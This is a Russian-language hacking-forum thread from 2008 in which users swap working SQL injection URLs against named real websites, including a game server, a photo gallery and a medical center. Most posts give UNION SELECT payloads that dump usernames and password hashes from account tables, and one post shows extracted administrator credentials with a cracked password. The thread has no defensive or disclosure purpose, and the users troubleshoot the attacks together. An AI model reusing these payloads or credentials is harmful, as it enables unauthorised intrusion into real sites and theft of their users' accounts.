HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.06.2008, 02:13
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
Провел на форуме:
20371

Репутация: -1
По умолчанию

а в нём http://wow.alania.net/ такое проканает?
 
Ответить с цитированием

  #2  
Старый 16.06.2008, 02:21
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Проканает
http://wow.alania.net/gilds.php?guid=-3+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*
 
Ответить с цитированием

  #3  
Старый 16.06.2008, 02:24
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
Провел на форуме:
20371

Репутация: -1
По умолчанию

значит сейчас нада писать вот так
http://wow.alania.net/gilds.php?guid=-3+union+select+111,222,username,user_password/*
 
Ответить с цитированием

  #4  
Старый 16.06.2008, 02:27
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Сейчас нужно идти вот сюда
http://forum.antichat.ru/showthread.php?t=19605
и ЧИТАТЬ ЧИТАТЬ ЧИТАТЬ
а иначе всегда будут подобные вопросы.... вот чесно, сам подумай ОТКУДА ТЫ взял что там есть эти поля и ИЗ КАКОЙ таблицы ты выводишь
Удачи!
 
Ответить с цитированием

  #5  
Старый 16.06.2008, 02:30
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Давайте все-таки в этой теме задавать вопросы, а не бредовать на тему сделайте мне скуль иньекцию. Здесь могут помочь в нестандартном\непонятном случае, но забивать тему элементарными вопросами сто раз расписанными в статьях не стоит. Буду удалять
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #6  
Старый 16.06.2008, 03:13
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

_http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_ hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+l imit+0,1/*

Константинэ... только не ругай меня...
P.S Не могу уснуть...

Последний раз редактировалось Ch3ck; 16.06.2008 в 03:15..
 
Ответить с цитированием

  #7  
Старый 16.06.2008, 06:50
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

JoN.SmiT не падай в минуса..) читай ману.

еще чтот разкрутил..
Цитата:
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6+from+u65735.be_users/*
administrator:d9d1b168eac8f197e0576b56cfc23ece => gfhjkm

Цитата:
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6+from+u65735.fe_users/*
administrator;password

Есть скуля в поле login, как получить аутпут?)
Цитата:
http://www.rusrek.com/ru/weather/?login=1'+union+select+1/*&password=default

Последний раз редактировалось sabe; 16.06.2008 в 07:08..
 
Ответить с цитированием

  #8  
Старый 16.06.2008, 07:25
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+order+by+1/*
- здесь 1 колонка

http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+union+select+1/* - а тут пишет
Цитата:
Query failed: The used SELECT statements have a different number of columns
- в чем проблема? В неправильных количествах колонок? Их всего одна

Хм..странно.
Вот тут все нормально сработало:
http://www.rciscc.uz/news.php?id=110'+union+select+1,2,3,user(),5,6,7/*

Последний раз редактировалось Ershik; 16.06.2008 в 07:27..
 
Ответить с цитированием

  #9  
Старый 16.06.2008, 07:30
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

в общем есть скуль:
Код:
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(column_name,0x3c2f62723e)+from+information_schema.columns+where+table_name='user'/*
но при попытке просмотра таблицы
Код:
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat_ws(0x3a3a,login,password,email,0x3c2f62723e)+from+medsunr_mifegyn.user/*
мы ничего не получаем (точнее получаем ошибку) следовательно доступ к стаблице закрыт? или я что то не так делаю...
 
Ответить с цитированием

  #10  
Старый 16.06.2008, 08:46
z3r0cool
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918

Репутация: 56
Отправить сообщение для z3r0cool с помощью ICQ
По умолчанию

Цитата:
Сообщение от gisTy  
...
Это обычная таблица (не VIEW), т.ч. фильтрации вывода нет.

Записей в ней нет.



http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(TABLE_NAME,'-',TABLE_TYPE,'-',TABLE_ROWS,0x3c2f62723e)+from+INFORMATION_SCHEMA .TABLES/*

Хотя можно посмотреть и так.

http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,COUNT(*)+from+medsunr_mifegyn. user/*

Если бы небыло прав, то показало бы ошибку.

Последний раз редактировалось z3r0cool; 16.06.2008 в 08:49..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ